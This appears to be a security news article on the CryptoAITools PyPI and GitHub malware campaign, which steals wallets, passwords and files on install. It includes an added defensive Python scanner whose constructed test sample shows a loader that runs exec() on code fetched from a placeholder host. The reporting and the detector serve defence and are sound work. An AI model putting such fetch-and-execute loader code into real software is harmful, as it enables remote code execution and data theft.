Researchers Uncover Python Package Targeting Crypto Wallets with Malicious Code
Security researchers have uncovered a new malicious Python package that poses as a cryptocurrency trading tool but contains functionality built to steal sensitive information and drain funds from victims’ cryptocurrency wallets.
The package, named “CryptoAITools,” was reportedly distributed through both the Python Package Index (PyPI) and fake GitHub repositories. It was downloaded over 1,300 times before being removed from PyPI.
“The malevolent program initiated automatically once installed, aiming at both Windows and macOS platforms,” Checkmarx revealed in a fresh analysis shared with The Hacker News. “A misleading visual user interface (UI) was utilized to divert recipients’ attention while the malware conducted its malevolent operations behind the scenes.”
The package is designed to launch its malicious behaviour immediately after installation through code placed in its “__init__.py” script, which first checks whether the host system is Windows or macOS in order to run the matching version of the malware.
Embedded in that code is a helper function that downloads and executes further payloads, setting off a multi-stage infection chain.
Specifically, the payloads are fetched from a fake website (“coinsw[.]app”) that advertises a cryptocurrency trading bot service; its real purpose is to lend the domain an air of legitimacy should a developer decide to visit it directly in a web browser.
This approach not only helps the threat actors evade detection but also lets them extend the malware’s capabilities easily by simply swapping the payloads hosted on the legitimate-looking site.
A notable aspect of the infection routine is a graphical UI component that serves to distract victims with a fake setup process while the malware quietly harvests sensitive data from the system.
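As an added, defender-side example (not code from the article or from Checkmarx), the check below parses a package's `__init__.py` or `setup.py` with the standard `ast` module and flags the loader shape described above: an OS check, a network fetch and an exec/subprocess call reachable from the module body. The function names and the two sample inputs are constructed for this example; the URL in the sample is a placeholder and nothing is fetched or executed.

```python
import ast

# Dotted call names that suggest a staged loader; extend for your own review.
NETWORK = {"urllib.request.urlopen", "urlopen", "requests.get", "urlretrieve"}
EXECUTE = {"exec", "eval", "compile", "subprocess.Popen", "subprocess.run", "os.system"}

def _dotted(node):
    """Rebuild 'pkg.mod.attr' from a Name/Attribute chain; None for other exprs."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage(source: str) -> dict:
    """Return which loader traits appear in the module source plus a verdict."""
    tree = ast.parse(source)
    found = {"platform_check": False, "network_fetch": False,
             "exec": False, "top_level_call": False}
    # A bare call or if-block in the module body runs as soon as the module is
    # imported, which is the install-time trigger the article describes.
    for stmt in tree.body:
        if isinstance(stmt, ast.If) or (
                isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)):
            found["top_level_call"] = True
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func) or ""
            found["network_fetch"] |= name in NETWORK
            found["exec"] |= name in EXECUTE
            found["platform_check"] |= name == "platform.system"
        elif isinstance(node, ast.Attribute) and _dotted(node) == "sys.platform":
            found["platform_check"] = True
    found["suspicious"] = (found["network_fetch"] and found["exec"]
                           and found["top_level_call"])
    return found

# Constructed sample shaped like the loader described above (placeholder URL).
LOADER_SAMPLE = '''
import platform, urllib.request
def fetch(u): return urllib.request.urlopen(u).read()
if platform.system() == "Windows":
    exec(fetch("https://example.invalid/win"))
else:
    exec(fetch("https://example.invalid/mac"))
'''
# Constructed benign package init: imports, a constant and a function only.
BENIGN_SAMPLE = "import os\n__version__ = '1.0'\ndef helper(): return os.getcwd()\n"
```

Run `triage()` over every `__init__.py` and `setup.py` in a downloaded sdist before installing it; a hit is a reason to read the file, not proof of malice.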
“The CryptoAITools malware conducts a comprehensive data thievery operation, targeting a broad array of sensitive data on the compromised system,” Checkmarx outlined. “The primary objective is to amass any data that could facilitate the attacker in embezzling digital currency assets.”
This includes data from cryptocurrency wallets (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passwords, cookies, browsing history, cryptocurrency extensions, SSH keys, files in the Downloads, Documents and Desktop folders that reference cryptocurrencies, passwords or financial details, and Telegram data.
On Apple macOS devices, the stealer also collects information from the Apple Notes and Stickies apps. The harvested data is then uploaded to the gofile[.]io file-transfer service, after which the local copy is deleted.
Checkmarx also found the threat actor distributing the same stealer malware through a GitHub repository named Meme Token Hunter Bot, which claims to be “an AI-driven trading bot that lists all meme tokens on the Solana network and performs real-time exchanges once they are deemed secure.”
This suggests the campaign also targets cryptocurrency users who choose to clone and run the code directly from GitHub. The repository, which is still live at present, has been forked once and starred 10 times.
The operators also run a Telegram group that promotes the aforementioned GitHub repository and offers monthly subscriptions and technical support.
“This multi-platform strategy enables the attacker to reach a large audience, potentially capturing victims who might be cautious about one platform but trust another,” highlighted Checkmarx.
“The CryptoAITools malware campaign carries severe repercussions for the victims and the wider digital currency community. Users who favored or copied the deceitful ‘Meme-Token-Hunter-Bot’ repository are probable victims, significantly extending the reach of the attack.”